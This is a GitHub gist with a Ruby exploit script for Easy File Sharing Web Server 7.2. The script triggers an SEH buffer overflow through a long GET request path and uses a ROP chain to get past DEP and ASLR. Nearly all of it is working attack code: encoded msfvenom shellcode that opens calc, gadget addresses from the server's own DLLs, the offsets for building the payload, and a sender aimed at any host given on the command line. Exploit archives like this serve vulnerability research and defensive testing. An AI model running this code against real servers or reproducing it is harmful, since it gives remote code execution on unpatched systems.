Created
January 9, 2016 15:11
-
-
Save mfadzilr/256db6f42dd297ddfb20 to your computer and use it in GitHub Desktop.
Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow (DEP+ASLR Bypass)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| # encoding: ASCII-8BIT | |
| # Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow (DEP+ASLR Bypass) | |
| # Date: Jan 05 2016 | |
| # Vulnerability Discovery: ArminCyber | |
| # Exploit Author: Muhamad Fadzil Ramli <mind1355[at]gmail.com> | |
| # Software Link: https://www.exploit-db.com/apps/60f3ff1f3cd34dec80fba130ea481f31-efssetup.exe | |
| # Version: 7.2 | |
| # Tested on: Microsoft Windows 7 x86 [Version 6.1.7601] | |
| # EBD-ID: 39008 | |
| # Usage: ruby easyfilex.rb <host> <port> | |
| require 'net/http' | |
| # ./msfvenom -p windows/exec CMD="calc" EXITFUNC="thread" -a x86 --platform win -e x86/alpha_mixed -b "\x00\x20\x2f\x5c" -f ruby | |
| buf = | |
| "\xeb\x5e\x90\x90" + # jmp over 96 byte of junk | |
| "\x90" * 100 + # junk | |
| "\x89\xe0\xda\xc5\xd9\x70\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a" + | |
| "\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59" + | |
| "\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41" + | |
| "\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42" + | |
| "\x75\x4a\x49\x69\x6c\x59\x78\x4d\x52\x35\x50\x67\x70\x35" + | |
| "\x50\x71\x70\x6d\x59\x49\x75\x54\x71\x6f\x30\x51\x74\x6c" + | |
| "\x4b\x32\x70\x44\x70\x6c\x4b\x50\x52\x76\x6c\x6e\x6b\x43" + | |
| "\x62\x37\x64\x6c\x4b\x73\x42\x44\x68\x66\x6f\x58\x37\x30" + | |
| "\x4a\x61\x36\x50\x31\x49\x6f\x6e\x4c\x55\x6c\x53\x51\x51" + | |
| "\x6c\x35\x52\x54\x6c\x47\x50\x4b\x71\x6a\x6f\x76\x6d\x75" + | |
| "\x51\x49\x57\x6d\x32\x79\x62\x63\x62\x31\x47\x6e\x6b\x32" + | |
| "\x72\x52\x30\x6e\x6b\x70\x4a\x67\x4c\x4e\x6b\x50\x4c\x37" + | |
| "\x61\x64\x38\x78\x63\x52\x68\x66\x61\x4e\x31\x43\x61\x6e" + | |
| "\x6b\x76\x39\x71\x30\x76\x61\x48\x53\x4e\x6b\x63\x79\x35" + | |
| "\x48\x4b\x53\x65\x6a\x72\x69\x6c\x4b\x76\x54\x6c\x4b\x66" + | |
| "\x61\x78\x56\x34\x71\x49\x6f\x4c\x6c\x4b\x71\x6a\x6f\x34" + | |
| "\x4d\x55\x51\x49\x57\x74\x78\x49\x70\x33\x45\x4a\x56\x57" + | |
| "\x73\x33\x4d\x7a\x58\x57\x4b\x33\x4d\x76\x44\x62\x55\x6b" + | |
| "\x54\x63\x68\x6c\x4b\x66\x38\x77\x54\x65\x51\x68\x53\x75" + | |
| "\x36\x4e\x6b\x64\x4c\x70\x4b\x6e\x6b\x66\x38\x55\x4c\x75" + | |
| "\x51\x4b\x63\x6e\x6b\x73\x34\x6c\x4b\x73\x31\x6a\x70\x4f" + | |
| "\x79\x61\x54\x57\x54\x65\x74\x51\x4b\x63\x6b\x61\x71\x30" + | |
| "\x59\x63\x6a\x33\x61\x79\x6f\x6b\x50\x51\x4f\x71\x4f\x71" + | |
| "\x4a\x4e\x6b\x74\x52\x38\x6b\x4e\x6d\x61\x4d\x53\x5a\x77" + | |
| "\x71\x6e\x6d\x4d\x55\x4d\x62\x37\x70\x47\x70\x63\x30\x76" + | |
| "\x30\x61\x78\x34\x71\x6e\x6b\x52\x4f\x6e\x67\x39\x6f\x58" + | |
| "\x55\x4f\x4b\x39\x70\x77\x6d\x45\x7a\x54\x4a\x43\x58\x49" + | |
| "\x36\x4c\x55\x6d\x6d\x6d\x4d\x59\x6f\x38\x55\x75\x6c\x33" + | |
| "\x36\x63\x4c\x65\x5a\x4b\x30\x79\x6b\x6b\x50\x61\x65\x37" + | |
| "\x75\x4f\x4b\x62\x67\x37\x63\x50\x72\x50\x6f\x43\x5a\x57" + | |
| "\x70\x46\x33\x79\x6f\x39\x45\x53\x53\x30\x61\x70\x6c\x65" + | |
| "\x33\x37\x70\x41\x41" | |
| # rop gadget by mona.py | |
| rop_gadgets = | |
| [ | |
| 0x10015442, # POP EAX # RETN | |
| 0xFFFE5A6C, # offset 1A594 from EBP | |
| 0x100231d1, # NEG EAX # RETN | |
| 0x61c30547, # ADD EBP,EAX # RETN | |
| 0x61c46b34, # XCHG EAX,EBP # RETN # EAX hold pointer to kernel32.address | |
| 0x10010102, # POP ECX # RETN | |
| 0xFFFF3EB9, # virtualprotect offset C147 from kernel32.address | |
| 0x1001BC43, # ADD DWORD PTR DS:[EAX],ECX # RETN | |
| 0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN # EAX = kernel32.virtualprotect.address | |
| 0x61c18d81, # XCHG EAX,EDI # RETN [sqlite3.dll] | |
| 0x1001db66, # POP ESI # RETN [ImageLoad.dll] | |
| 0xffffffff, # | |
| 0x1001e80f, # INC ESI # ADD AL,5E # RETN [ImageLoad.dll] | |
| 0x10021a3e, # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll] | |
| 0x10014236, # POP EBP # RETN [ImageLoad.dll] | |
| 0x61c24169, # & push esp # ret [sqlite3.dll] | |
| 0x1001416e, # POP EBX # RETN | |
| 0xFFFFFFFF, | |
| 0x1001f6da, # INC EBX # ADD AL,83 # RETN | |
| 0x10015442, # POP EAX # RETN | |
| 0x111111FF, | |
| 0x1001c15b, # ADD BL,AL # XOR EAX,EAX # RETN | |
| 0x61c0d002, # INC EBX # SUB AL,CL # RETN | |
| 0x10015442, # POP EAX # RETN | |
| 0x111111FF, | |
| 0x1001c15b, # ADD BL,AL # XOR EAX,EAX # RETN | |
| 0x61c0d002, # INC EBX # SUB AL,CL # RETN | |
| 0x61c0d002, # INC EBX # SUB AL,CL # RETN # end | |
| 0x10022c4c, # XOR EDX,EDX # RETN [ImageLoad.dll] | |
| 0x10015442, # POP EAX # RETN | |
| 0x41414140, # | |
| 0x1001ab13, # ADD DL,AL # OR AL,0 # XOR EAX,EAX # RETN 0x0C | |
| 0x1001bee1, # POP ECX # RETN [ImageLoad.dll] | |
| 0x41414141, # Filler for retn 0x0c | |
| 0x41414141, # Filler | |
| 0x41414141, # Filler | |
| 0x1004D199, # &Writable location [sqlite3.dll] | |
| 0x100228f3, # POP EDI # RETN [ImageLoad.dll] | |
| 0x1001a858, # RETN (ROP NOP) [ImageLoad.dll] | |
| 0x10015442, # POP EAX # RETN [ImageLoad.dll] | |
| 0x90909090, # nop | |
| 0x100240c2, # PUSHAD # RETN [ImageLoad.dll] | |
| ].flatten.pack("V*") | |
| payload = "A" * 4500 | |
| payload[2573,rop_gadgets.size] = rop_gadgets | |
| payload[2573+rop_gadgets.size,buf.size] = buf | |
| payload[4065,4] = [0x10022877].pack('V') # seh - stack pivot [ImageLoad.dll] | |
| host = ARGV[0] | |
| port = ARGV[1] | |
| begin | |
| puts "[+] sending payload ..." | |
| http = Net::HTTP.new(host, port) | |
| path = "/#{payload}" | |
| http.get(path, nil) | |
| rescue => e | |
| puts "[!] error : #{e}" | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment